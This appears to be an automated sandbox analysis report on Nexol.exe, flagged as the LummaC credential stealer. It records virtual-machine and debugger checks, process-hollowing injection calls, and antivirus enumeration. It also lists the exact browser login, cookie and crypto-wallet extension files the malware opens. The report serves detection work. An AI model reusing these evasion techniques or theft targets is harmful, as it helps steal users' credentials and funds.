Source: C:\Users\user\Desktop\Nexol.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Nexol.exe	Memory allocated: 26B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Memory allocated: 28D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Memory allocated: 26E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Nexol.exe

Window / User API: threadDelayed 4352

Jump to behavior

Source: C:\Users\user\Desktop\Nexol.exe TID: 1424	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe TID: 7880	Thread sleep count: 4352 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Nexol.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Nexol.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Nexol.exe	Last function: Thread delayed

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Nexol.exe, 00000006.00000002.2544312757.00000000014AB000.00000004.00000020.00020000.00000000.sdmp, Nexol.exe, 00000006.00000002.2543893852.000000000146C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Nexol.exe

API call chain: ExitProcess graph end node

graph_6-21866

Source: C:\Users\user\Desktop\Nexol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Nexol.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Nexol.exe

Code function: 6_2_0044A270 LdrInitializeThunk,

6_2_0044A270

Source: C:\Users\user\Desktop\Nexol.exe	Code function: 5_2_028D2141 mov edi, dword ptr fs:[00000030h]		5_2_028D2141
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 5_2_028D22BE mov edi, dword ptr fs:[00000030h]		5_2_028D22BE

Source: C:\Users\user\Desktop\Nexol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Nexol.exe

Code function: 5_2_028D2141 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

5_2_028D2141

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Nexol.exe

Memory written: C:\Users\user\Desktop\Nexol.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Nexol.exe

Process created: C:\Users\user\Desktop\Nexol.exe "C:\Users\user\Desktop\Nexol.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Nexol.exe	Queries volume information: C:\Users\user\Desktop\Nexol.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Nexol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Nexol.exe, 00000006.00000002.2544160017.0000000001485000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\Nexol.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 6.2.Nexol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Nexol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Nexol.exe.38d9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2542777376.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Nexol.exe, 00000006.00000002.2544312757.00000000014AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: Nexol.exe, 00000006.00000002.2544312757.00000000014AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Nexol.exe, 00000006.00000002.2544312757.00000000014AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Nexol.exe, 00000006.00000002.2544684436.0000000001533000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: Nexol.exe, 00000006.00000002.2544312757.00000000014AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Nexol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
